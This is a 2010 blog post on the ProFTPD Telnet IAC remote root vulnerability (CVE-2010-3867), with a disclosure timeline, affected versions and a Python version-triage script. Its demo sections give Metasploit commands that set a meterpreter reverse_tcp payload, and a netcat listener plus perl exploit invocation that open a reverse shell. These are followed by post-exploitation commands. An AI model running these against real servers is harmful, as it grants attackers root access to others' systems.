
Published on November 9th, 2010


CVE-2010-3867 : ProFTPD IAC Remote Root Exploit




Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang

Metasploit and Exploit-DB exploits demonstrations

Timeline :
Vulnerability reported to the vendor by ZDI on 2010-09-24
Coordinated public release of the advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07

PoC provided by:
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

References :
CVE-2010-3867
EDB-15449

Affected versions :
ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
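
For inventory triage against the affected range above, a version check has to order ProFTPD's `rcN` and letter suffixes correctly, which plain string comparison does not (it sorts `1.3.2` before `1.3.2rc3`). The following is an added example, not code from this page, Metasploit or Exploit-DB; it assumes both bounds are inclusive, that within one x.y.z the order is rc1 < rc2 < release < a < b, and the sample greetings are constructed.

```python
import re

# Bounds as stated on this page; treating both ends as inclusive is an assumption.
FIRST_AFFECTED = "1.3.2rc3"
LAST_AFFECTED = "1.3.3b"

_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?$")
_BANNER = re.compile(r"ProFTPD (\d+\.\d+\.\d+(?:rc\d+|[a-z])?)\b")


def version_key(version):
    """Map a version string to a sortable tuple: rcN < release < a < b."""
    m = _VERSION.match(version)
    if m is None:
        raise ValueError(f"unrecognised ProFTPD version: {version!r}")
    major, minor, patch, rc, letter = m.groups()
    if rc is not None:                       # release candidate: before the release
        return (int(major), int(minor), int(patch), 0, int(rc))
    if letter is not None:                   # maintenance release: after the release
        return (int(major), int(minor), int(patch), 1, ord(letter) - ord("a") + 1)
    return (int(major), int(minor), int(patch), 1, 0)


def is_affected(version):
    """True if version lies within the affected range given on this page."""
    return version_key(FIRST_AFFECTED) <= version_key(version) <= version_key(LAST_AFFECTED)


def triage_banner(banner):
    """Return (version, affected) from an FTP greeting, or (None, None)."""
    m = _BANNER.search(banner)
    if m is None:                            # banner hidden or not ProFTPD
        return None, None
    return m.group(1), is_affected(m.group(1))


# Constructed sample greetings, not taken from the video.
SAMPLES = [
    "220 ProFTPD 1.3.3a Server (Debian) [192.168.178.40]",
    "220 ProFTPD 1.3.2 Server (ProFTPD Default Installation) [10.0.0.5]",
    "220 ProFTPD 1.3.3c Server (files) [10.0.0.6]",
    "220 FTP server ready",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage_banner(line), "<-", line)
```

The greeting can be changed or suppressed with the `ServerIdent` directive, and distribution packages may carry backported fixes without changing the upstream version string, so treat the result as a triage signal and confirm against the installed package.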





Description:
This module exploits a stack-based buffer overflow in ProFTPD server versions between 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.

Metasploit demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5

id
uname -a
ifconfig

